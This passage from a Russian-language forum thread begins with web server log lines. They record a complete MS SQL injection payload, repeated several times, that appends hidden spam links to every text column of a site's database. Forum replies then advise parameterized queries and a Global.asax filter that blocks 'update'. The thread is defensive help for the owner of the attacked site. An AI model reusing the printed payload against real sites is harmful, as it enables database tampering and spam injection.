http://google.com';declare+@c+cursor;declare+@d+varchar(4000);set+@c=cursor+for+select+'update+['+TABLE_NAME+']+set+['+COLUMN_NAME+']=['+COLUMN_NAME+']+case+ABS(CHECKSUM(NewId()))%7+when+0+then+''<div+style="display:none">open+<a+href="http://by-expression.com/page/my-girlfriend-started-to-communicate-with-ex">''+case+ABS(CHECKSUM(NewId()))%3+when+0+then+''why+men+cheat''+when+1+then+''women+who+cheated''+else+''read''+end++''</a>+online</div>''+else+''''+end'+FROM+sysindexes+AS+i+INNER+JOIN+sysobjects+AS+o+ON+i.id=o.id+INNER+JOIN+INFORMATION_SCHEMA.COLUMNS+ON+o.NAME=TABLE_NAME+WHERE(indid=0+or+indid=1)+and+DATA_TYPE+like+'%varchar'+and(CHARACTER_MAXIMUM_LENGTH=-1+or+CHARACTER_MAXIMUM_LENGTH=2147483647);open+@c;fetch+next+from+@c+into+@d;while+@@FETCH_STATUS=0+begin+exec+(@d);fetch+next+from+@c+into+@d;end;close+@c-- www.site.ru 302 458 3244 0
2015-02-23 17:26:27 GET /error.aspx aspxerrorpath=/info.aspx 202.6.132.70 HTTP/1.0 Mozilla/5.0+(Windows+NT+6.1;+WOW64;+rv:24.0)+Gecko/20100101+Firefox/24.0';declare+@c+cursor;declare+@d+varchar(4000);set+@c=cursor+for+select+'update+['+TABLE_NAME+']+set+['+COLUMN_NAME+']=['+COLUMN_NAME+']+case+ABS(CHECKSUM(NewId()))%7+when+0+then+''<div+style="display:none">open+<a+href="http://by-expression.com/page/my-girlfriend-started-to-communicate-with-ex">''+case+ABS(CHECKSUM(NewId()))%3+when+0+then+''why+men+cheat''+when+1+then+''women+who+cheated''+else+''read''+end++''</a>+online</div>''+else+''''+end'+FROM+sysindexes+AS+i+INNER+JOIN+sysobjects+AS+o+ON+i.id=o.id+INNER+JOIN+INFORMATION_SCHEMA.COLUMNS+ON+o.NAME=TABLE_NAME+WHERE(indid=0+or+indid=1)+and+DATA_TYPE+like+'%varchar'+and(CHARACTER_MAXIMUM_LENGTH=-1+or+CHARACTER_MAXIMUM_LENGTH=2147483647);open+@c;fetch+next+from+@c+into+@d;while+@@FETCH_STATUS=0+begin+exec+(@d);fetch+next+from+@c+into+@d;end;close+@c-- http://google.com';declare+@c+cursor;declare+@d+varchar(4000);set+@c=cursor+for+select+'update+['+TABLE_NAME+']+set+['+COLUMN_NAME+']=['+COLUMN_NAME+']+case+ABS(CHECKSUM(NewId()))%7+when+0+then+''<div+style="display:none">open+<a+href="http://by-expression.com/page/my-girlfriend-started-to-communicate-with-ex">''+case+ABS(CHECKSUM(NewId()))%3+when+0+then+''why+men+cheat''+when+1+then+''women+who+cheated''+else+''read''+end++''</a>+online</div>''+else+''''+end'+FROM+sysindexes+AS+i+INNER+JOIN+sysobjects+AS+o+ON+i.id=o.id+INNER+JOIN+INFORMATION_SCHEMA.COLUMNS+ON+o.NAME=TABLE_NAME+WHERE(indid=0+or+indid=1)+and+DATA_TYPE+like+'%varchar'+and(CHARACTER_MAXIMUM_LENGTH=-1+or+CHARACTER_MAXIMUM_LENGTH=2147483647);open+@c;fetch+next+from+@c+into+@d;while+@@FETCH_STATUS=0+begin+exec+(@d);fetch+next+from+@c+into+@d;end;close+@c-- www.site.ru 200 7108 2052 0
2015-02-23 17:26:43 GET /info.aspx infoid=20;declare%20@c%20cursor;declare%20@d%20varchar(4000);set%20@c=cursor%20for%20select%20'update%20%5B'%2BTABLE_NAME%2B'%5D%20set%20%5B'%2BCOLUMN_NAME%2B'%5D=%5B'%2BCOLUMN_NAME%2B'%5D%2Bcase%20ABS(CHECKSUM(NewId()))%257%20when%200%20then%20''''%2Bchar(60)%2B''div%20style=%22display:none%22''%2Bchar(62)%2B''open%20''%2Bchar(60)%2B''a%20href=%22http:''%2Bchar(47)%2Bchar(47)%2B''by-expression.com''%2Bchar(47)%2B''page''%2Bchar(47)%2B''my-girlfriend-started-to-communicate-with-ex%22''%2Bchar(62)%2Bcase%20ABS(CHECKSUM(NewId()))%253%20when%200%20then%20''why%20men%20cheat''%20when%201%20then%20''women%20who%20cheated''%20else%20''read''%20end%20%2Bchar(60)%2Bchar(47)%2B''a''%2Bchar(62)%2B''%20online''%2Bchar(60)%2Bchar(47)%2B''div''%2Bchar(62)%2B''''%20else%20''''%20end'%20FROM%20sysindexes%20AS%20i%20INNER%20JOIN%20sysobjects%20AS%20o%20ON%20i.id=o.id%20INNER%20JOIN%20INFORMATION_SCHEMA.COLUMNS%20ON%20o.NAME=TABLE_NAME%20WHERE(indid=0%20or%20indid=1)%20and%20DATA_TYPE%20like%20'%25varchar'%20and(CHARACTER_MAXIMUM_LENGTH=-1%20or%20CHARACTER_MAXIMUM_LENGTH=2147483647);open%20@c;fetch%20next%20from%20@c%20into%20@d;while%20@@FETCH_STATUS=0%20begin%20exec%20(@d);fetch%20next%20from%20@c%20into%20@d;end;close%20@c-- 202.6.132.70 HTTP/1.0 Mozilla/5.0+(Windows+NT+6.1;+WOW64;+rv:24.0)+Gecko/20100101+Firefox/24.0;declare+@c+cursor;declare+@d+varchar(4000);set+@c=cursor+for+select+'update+['+TABLE_NAME+']+set+['+COLUMN_NAME+']=['+COLUMN_NAME+']+case+ABS(CHECKSUM(NewId()))%7+when+0+then+''<div+style="display:none">open+<a+href="http://by-expression.com/page/my-girlfriend-started-to-communicate-with-ex">''+case+ABS(CHECKSUM(NewId()))%3+when+0+then+''why+men+cheat''+when+1+then+''women+who+cheated''+else+''read''+end++''</a>+online</div>''+else+''''+end'+FROM+sysindexes+AS+i+INNER+JOIN+sysobjects+AS+o+ON+i.id=o.id+INNER+JOIN+INFORMATION_SCHEMA.COLUMNS+ON+o.NAME=TABLE_NAME+WHERE(indid=0+or+indid=1)+and+DATA_TYPE+like+'%varchar'+and(CHARACTER_MAXIMUM_LENGTH=-1+or+CHARACTER_MAXIMUM_LENGTH=2147483647);open+@c;fetch+next+from+@c+into+@d;while+@@FETCH_STATUS=0+begin+exec+(@d);fetch+next+from+@c+into+@d;end;close+@c-- http://google.com;declare+@c+cursor;declare+@d+varchar(4000);set+@c=cursor+for+select+'update+['+TABLE_NAME+']+set+['+COLUMN_NAME+']=['+COLUMN_NAME+']+case+ABS(CHECKSUM(NewId()))%7+when+0+then+''<div+style="display:none">open+<a+href="http://by-expression.com/page/my-girlfriend-started-to-communicate-with-ex">''+case+ABS(CHECKSUM(NewId()))%3+when+0+then+''why+men+cheat''+when+1+then+''women+who+cheated''+else+''read''+end++''</a>+online</div>''+else+''''+end'+FROM+sysindexes+AS+i+INNER+JOIN+sysobjects+AS+o+ON+i.id=o.id+INNER+JOIN+INFORMATION_SCHEMA.COLUMNS+ON+o.NAME=TABLE_NAME+WHERE(indid=0+or+indid=1)+and+DATA_TYPE+like+'%varchar'+and(CHARACTER_MAXIMUM_LENGTH=-1+or+CHARACTER_MAXIMUM_LENGTH=2147483647);open+@c;fetch+next+from+@c+into+@d;while+@@FETCH_STATUS=0+begin+exec+(@d);fetch+next+from+@c+into+@d;end;close+@c-- www.site.ru 200 32146 3241 14140
2015-02-23 17:26:46 GET /info.aspx infoid=20);declare%20@c%20cursor;declare%20@d%20varchar(4000);set%20@c=cursor%20for%20select%20'update%20%5B'%2BTABLE_NAME%2B'%5D%20set%20%5B'%2BCOLUMN_NAME%2B'%5D=%5B'%2BCOLUMN_NAME%2B'%5D%2Bcase%20ABS(CHECKSUM(NewId()))%257%20when%200%20then%20''''%2Bchar(60)%2B''div%20style=%22display:none%22''%2Bchar(62)%2B''open%20''%2Bchar(60)%2B''a%20href=%22http:''%2Bchar(47)%2Bchar(47)%2B''by-expression.com''%2Bchar(47)%2B''page''%2Bchar(47)%2B''my-girlfriend-started-to-communicate-with-ex%22''%2Bchar(62)%2Bcase%20ABS(CHECKSUM(NewId()))%253%20when%200%20then%20''why%20men%20cheat''%20when%201%20then%20''women%20who%20cheated''%20else%20''read''%20end%20%2Bchar(60)%2Bchar(47)%2B''a''%2Bchar(62)%2B''%20online''%2Bchar(60)%2Bchar(47)%2B''div''%2Bchar(62)%2B''''%20else%20''''%20end'%20FROM%20sysindexes%20AS%20i%20INNER%20JOIN%20sysobjects%20AS%20o%20ON%20i.id=o.id%20INNER%20JOIN%20INFORMATION_SCHEMA.COLUMNS%20ON%20o.NAME=TABLE_NAME%20WHERE(indid=0%20or%20indid=1)%20and%20DATA_TYPE%20like%20'%25varchar'%20and(CHARACTER_MAXIMUM_LENGTH=-1%20or%20CHARACTER_MAXIMUM_LENGTH=2147483647);open%20@c;fetch%20next%20from%20@c%20into%20@d;while%20@@FETCH_STATUS=0%20begin%20exec%20(@d);fetch%20next%20from%20@c%20into%20@d;end;close%20@c-- 202.6.132.70 HTTP/1.0 Mozilla/5.0+(Windows+NT+6.1;+WOW64;+rv:24.0)+Gecko/20100101+Firefox/24.0);declare+@c+cursor;declare+@d+varchar(4000);set+@c=cursor+for+select+'update+['+TABLE_NAME+']+set+['+COLUMN_NAME+']=['+COLUMN_NAME+']+case+ABS(CHECKSUM(NewId()))%7+when+0+then+''<div+style="display:none">open+<a+href="http://by-expression.com/page/my-girlfriend-started-to-communicate-with-ex">''+case+ABS(CHECKSUM(NewId()))%3+when+0+then+''why+men+cheat''+when+1+then+''women+who+cheated''+else+''read''+end++''</a>+online</div>''+else+''''+end'+FROM+sysindexes+AS+i+INNER+JOIN+sysobjects+AS+o+ON+i.id=o.id+INNER+JOIN+INFORMATION_SCHEMA.COLUMNS+ON+o.NAME=TABLE_NAME+WHERE(indid=0+or+indid=1)+and+DATA_TYPE+like+'%varchar'+and(CHARACTER_MAXIMUM_LENGTH=-1+or+CHARACTER_MAXIMUM_LENGTH=2147483647);open+@c;fetch+next+from+@c+into+@d;while+@@FETCH_STATUS=0+begin+exec+(@d);fetch+next+from+@c+into+@d;end;close+@c-- http://google.com);declare+@c+cursor;declare+@d+varchar(4000);set+@c=cursor+for+select+'update+['+TABLE_NAME+']+set+['+COLUMN_NAME+']=['+COLUMN_NAME+']+case+ABS(CHECKSUM(NewId()))%7+when+0+then+''<div+style="display:none">open+<a+href="http://by-expression.com/page/my-girlfriend-started-to-communicate-with-ex">''+case+ABS(CHECKSUM(NewId()))%3+when+0+then+''why+men+cheat''+when+1+then+''women+who+cheated''+else+''read''+end++''</a>+online</div>''+else+''''+end'+FROM+sysindexes+AS+i+INNER+JOIN+sysobjects+AS+o+ON+i.id=o.id+INNER+JOIN+INFORMATION_SCHEMA.COLUMNS+ON+o.NAME=TABLE_NAME+WHERE(indid=0+or+indid=1)+and+DATA_TYPE+like+'%varchar'+and(CHARACTER_MAXIMUM_LENGTH=-1+or+CHARACTER_MAXIMUM_LENGTH=2147483647);open+@c;fetch+next+from+@c+into+@d;while+@@FETCH_STATUS=0+begin+exec+(@d);fetch+next+from+@c+into+@d;end;close+@c-- www.site.ru 302 458 3244 31
2015-02-23 17:26:46 GET /error.aspx aspxerrorpath=/info.aspx 202.6.132.70 HTTP/1.0 Mozilla/5.0+(Windows+NT+6.1;+WOW64;+rv:24.0)+Gecko/20100101+Firefox/24.0);declare+@c+cursor;declare+@d+varchar(4000);set+@c=cursor+for+select+'update+['+TABLE_NAME+']+set+['+COLUMN_NAME+']=['+COLUMN_NAME+']+case+ABS(CHECKSUM(NewId()))%7+when+0+then+''<div+style="display:none">open+<a+href="http://by-expression.com/page/my-girlfriend-started-to-communicate-with-ex">''+case+ABS(CHECKSUM(NewId()))%3+when+0+then+''why+men+cheat''+when+1+then+''women+who+cheated''+else+''read''+end++''</a>+online</div>''+else+''''+end'+FROM+sysindexes+AS+i+INNER+JOIN+sysobjects+AS+o+ON+i.id=o.id+INNER+JOIN+INFORMATION_SCHEMA.COLUMNS+ON+o.NAME=TABLE_NAME+WHERE(indid=0+or+indid=1)+and+DATA_TYPE+like+'%varchar'+and(CHARACTER_MAXIMUM_LENGTH=-1+or+CHARACTER_MAXIMUM_LENGTH=2147483647);open+@c;fetch+next+from+@c+into+@d;while+@@FETCH_STATUS=0+begin+exec+(@d);fetch+next+from+@c+into+@d;end;close+@c-- http://google.com);declare+@c+cursor;declare+@d+varchar(4000);set+@c=cursor+for+select+'update+['+TABLE_NAME+']+set+['+COLUMN_NAME+']=['+COLUMN_NAME+']+case+ABS(CHECKSUM(NewId()))%7+when+0+then+''<div+style="display:none">open+<a+href="http://by-expression.com/page/my-girlfriend-started-to-communicate-with-ex">''+case+ABS(CHECKSUM(NewId()))%3+when+0+then+''why+men+cheat''+when+1+then+''women+who+cheated''+else+''read''+end++''</a>+online</div>''+else+''''+end'+FROM+sysindexes+AS+i+INNER+JOIN+sysobjects+AS+o+ON+i.id=o.id+INNER+JOIN+INFORMATION_SCHEMA.COLUMNS+ON+o.NAME=TABLE_NAME+WHERE(indid=0+or+indid=1)+and+DATA_TYPE+like+'%varchar'+and(CHARACTER_MAXIMUM_LENGTH=-1+or+CHARACTER_MAXIMUM_LENGTH=2147483647);open+@c;fetch+next+from+@c+into+@d;while+@@FETCH_STATUS=0+begin+exec+(@d);fetch+next+from+@c+into+@d;end;close+@c-- www.site.ru 200 7108 2052 0
2015-02-23 17:26:47 GET /info.aspx infoid=20');declare%20@c%20cursor;declare%20@d%20varchar(4000);set%20@c=cursor%20for%20select%20'update%20%5B'%2BTABLE_NAME%2B'%5D%20set%20%5B'%2BCOLUMN_NAME%2B'%5D=%5B'%2BCOLUMN_NAME%2B'%5D%2Bcase%20ABS(CHECKSUM(NewId()))%257%20when%200%20then%20''''%2Bchar(60)%2B''div%20style=%22display:none%22''%2Bchar(62)%2B''open%20''%2Bchar(60)%2B''a%20href=%22http:''%2Bchar(47)%2Bchar(47)%2B''by-expression.com''%2Bchar(47)%2B''page''%2Bchar(47)%2B''my-girlfriend-started-to-communicate-with-ex%22''%2Bchar(62)%2Bcase%20ABS(CHECKSUM(NewId()))%253%20when%200%20then%20''why%20men%20cheat''%20when%201%20then%20''women%20who%20cheated''%20else%20''read''%20end%20%2Bchar(60)%2Bchar(47)%2B''a''%2Bchar(62)%2B''%20online''%2Bchar(60)%2Bchar(47)%2B''div''%2Bchar(62)%2B''''%20else%20''''%20end'%20FROM%20sysindexes%20AS%20i%20INNER%20JOIN%20sysobjects%20AS%20o%20ON%20i.id=o.id%20INNER%20JOIN%20INFORMATION_SCHEMA.COLUMNS%20ON%20o.NAME=TABLE_NAME%20WHERE(indid=0%20or%20indid=1)%20and%20DATA_TYPE%20like%20'%25varchar'%20and(CHARACTER_MAXIMUM_LENGTH=-1%20or%20CHARACTER_MAXIMUM_LENGTH=2147483647);open%20@c;fetch%20next%20from%20@c%20into%20@d;while%20@@FETCH_STATUS=0%20begin%20exec%20(@d);fetch%20next%20from%20@c%20into%20@d;end;close%20@c-- 202.6.132.70 HTTP/1.0 Mozilla/5.0+(Windows+NT+6.1;+WOW64;+rv:24.0)+Gecko/20100101+Firefox/24.0');declare+@c+cursor;declare+@d+varchar(4000);set+@c=cursor+for+select+'update+['+TABLE_NAME+']+set+['+COLUMN_NAME+']=['+COLUMN_NAME+']+case+ABS(CHECKSUM(NewId()))%7+when+0+then+''<div+style="display:none">open+<a+href="http://by-expression.com/page/my-girlfriend-started-to-communicate-with-ex">''+case+ABS(CHECKSUM(NewId()))%3+when+0+then+''why+men+cheat''+when+1+then+''women+who+cheated''+else+''read''+end++''</a>+online</div>''+else+''''+end'+FROM+sysindexes+AS+i+INNER+JOIN+sysobjects+AS+o+ON+i.id=o.id+INNER+JOIN+INFORMATION_SCHEMA.COLUMNS+ON+o.NAME=TABLE_NAME+WHERE(indid=0+or+indid=1)+and+DATA_TYPE+like+'%varchar'+and(CHARACTER_MAXIMUM_LENGTH=-1+or+CHARACTER_MAXIMUM_LENGTH=2147483647);open+@c;fetch+next+from+@c+into+@d;while+@@FETCH_STATUS=0+begin+exec+(@d);fetch+next+from+@c+into+@d;end;close+@c-- http://google.com');declare+@c+cursor;declare+@d+varchar(4000);set+@c=cursor+for+select+'update+['+TABLE_NAME+']+set+['+COLUMN_NAME+']=['+COLUMN_NAME+']+case+ABS(CHECKSUM(NewId()))%7+when+0+then+''<div+style="display:none">open+<a+href="http://by-expression.com/page/my-girlfriend-started-to-communicate-with-ex">''+case+ABS(CHECKSUM(NewId()))%3+when+0+then+''why+men+cheat''+when+1+then+''women+who+cheated''+else+''read''+end++''</a>+online</div>''+else+''''+end'+FROM+sysindexes+AS+i+INNER+JOIN+sysobjects+AS+o+ON+i.id=o.id+INNER+JOIN+INFORMATION_SCHEMA.COLUMNS+ON+o.NAME=TABLE_NAME+WHERE(indid=0+or+indid=1)+and+DATA_TYPE+like+'%varchar'+and(CHARACTER_MAXIMUM_LENGTH=-1+or+CHARACTER_MAXIMUM_LENGTH=2147483647);open+@c;fetch+next+from+@c+into+@d;while+@@FETCH_STATUS=0+begin+exec+(@d);fetch+next+from+@c+into+@d;end;close+@c-- www.site.ru 302 458 3247 0
2015-02-23 17:26:47 GET /error.aspx aspxerrorpath=/info.aspx 202.6.132.70 HTTP/1.0 Mozilla/5.0+(Windows+NT+6.1;+WOW64;+rv:24.0)+Gecko/20100101+Firefox/24.0');declare+@c+cursor;declare+@d+varchar(4000);set+@c=cursor+for+select+'update+['+TABLE_NAME+']+set+['+COLUMN_NAME+']=['+COLUMN_NAME+']+case+ABS(CHECKSUM(NewId()))%7+when+0+then+''<div+style="display:none">open+<a+href="http://by-expression.com/page/my-girlfriend-started-to-communicate-with-ex">''+case+ABS(CHECKSUM(NewId()))%3+when+0+then+''why+men+cheat''+when+1+then+''women+who+cheated''+else+''read''+end++''</a>+online</div>''+else+''''+end'+FROM+sysindexes+AS+i+INNER+JOIN+sysobjects+AS+o+ON+i.id=o.id+INNER+JOIN+INFORMATION_SCHEMA.COLUMNS+ON+o.NAME=TABLE_NAME+WHERE(indid=0+or+indid=1)+and+DATA_TYPE+like+'%varchar'+and(CHARACTER_MAXIMUM_LENGTH=-1+or+CHARACTER_MAXIMUM_LENGTH=2147483647);open+@c;fetch+next+from+@c+into+@d;while+@@FETCH_STATUS=0+begin+exec+(@d);fetch+next+from+@c+into+@d;end;close+@c-- http://google.com');declare+@c+cursor;declare+@d+varchar(4000);set+@c=cursor+for+select+'update+['+TABLE_NAME+']+set+['+COLUMN_NAME+']=['+COLUMN_NAME+']+case+ABS(CHECKSUM(NewId()))%7+when+0+then+''<div+style="display:none">open+<a+href="http://by-expression.com/page/my-girlfriend-started-to-communicate-with-ex">''+case+ABS(CHECKSUM(NewId()))%3+when+0+then+''why+men+cheat''+when+1+then+''women+who+cheated''+else+''read''+end++''</a>+online</div>''+else+''''+end'+FROM+sysindexes+AS+i+INNER+JOIN+sysobjects+AS+o+ON+i.id=o.id+INNER+JOIN+INFORMATION_SCHEMA.COLUMNS+ON+o.NAME=TABLE_NAME+WHERE(indid=0+or+indid=1)+and+DATA_TYPE+like+'%varchar'+and(CHARACTER_MAXIMUM_LENGTH=-1+or+CHARACTER_MAXIMUM_LENGTH=2147483647);open+@c;fetch+next+from+@c+into+@d;while+@@FETCH_STATUS=0+begin+exec+(@d);fetch+next+from+@c+into+@d;end;close+@c-- www.site.ru 200 7108 2054 0
2015-02-23 17:28:48 GET /pictures/object_1231.jpg - 5.164.109.62 HTTP/1.0 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.115+Safari/537.36 http://mufflesniall.blogspot.ru/2012/12/blog-post_8206.html www.site.ru 200 85171 488 15
 
Ответ # 18 # · +  +  дата добавления: 24.02.2015 / 13:01
Автор ответа:
Алексей Немиро
Алексей Немиро
тем: 534 / ответов: 5130 / благодарностей: 325 / репутация: 211
Чашка Kbyte.Ru>>
Url: aleksey.nemiro.ru
Icq: 261779681
Skype: alekseynemiro
ответов: 5130
создал(а) тем: 534


Нужно было прикрыть уязвимости...

Или хотя бы в Global.asax фильтр поставить (прикрыть лучше).
В лог-файлах, среди прочих, нашел строчки, в которых я ничего не понял, посмотрите, пожалуйста. Что бы это значило?
Или это только в логах, а в базе все нормально?
Если так, то всякие боты постоянно ищут уязвимости и не стоит обращать на это внимание.
 
Ответ # 19 # · +  +  дата добавления: 24.02.2015 / 16:16
Автор ответа:
anka_x
anka_x
тем: 8 / ответов: 61 / благодарностей: 0 / репутация: 4
ответов: 61
создал(а) тем: 8


Добрый день.

Спасибо, Алексей.

Внедрить параметризованные запросы не хватает ума, к сожалению. )

С базой все плохо, он гадит быстрее, чем я вычищаю...

Заметил, что добавки попадают только в поля nvarchar(MAX), а в старых полях ntext все чисто. Прочитал, что от ntext собираются отказываться. Стоит ли переводить поля в ntext?

Можно ли как-то вылавливать все Request.QueryString("***"), даже которые я не использую, которые длиннее разумного? :)

Пробовал фильтровать по IP, но он меняет Ip...

А какой фильтр в Global.asax может помочь?
 
Ответ # 20 # · +  +  дата добавления: 24.02.2015 / 17:45
Автор ответа:
Алексей Немиро
Алексей Немиро
тем: 534 / ответов: 5130 / благодарностей: 325 / репутация: 211
Чашка Kbyte.Ru>>
Url: aleksey.nemiro.ru
Icq: 261779681
Skype: alekseynemiro
ответов: 5130
создал(а) тем: 534


Внедрить параметризованные запросы не хватает ума, к сожалению. )
Там же просто добавить в запросы @имяПараметра и потом подставить значение:
cmd.Parameters.Add("@имяПараметра").Value = 123
А какой фильтр в Global.asax может помочь?
Вроде я уже где-то подобное показывал. Нужно обрабатывать событие Application_BeginRequest:
Sub Application_BeginRequest()
  If Request.QueryString.ToString().ToLower().IndexOf("update") <> -1 Then
     'строка запроса содержит UPDATE
     'можно фильтровать по фрагментам запросов SQL в строке запроса
     Response.StatusCode = 403
     Response.End()
     'или исключение выбрасывать
     Throw New Exception("Текст какой-то ошибки!")
  End If
End Sub
Но лучше прикрыть дырки, т.к. подобный метод будет тормозить работу сайта и фильтр может ошибочно реагировать на нормальные запросы.
Это только как временное решение можно использовать.
Прочитал, что от ntext собираются отказываться. Стоит ли переводить поля в ntext?
(n)varchar(MAX) удобней. Если возникнет необходимость, то можно перевести. Например, поиск через LIKE в полях (n)text, если не изменяет память, не работает, в отличие от (n)varchar.
 
Страница: 1 · 2 + Создать новую тему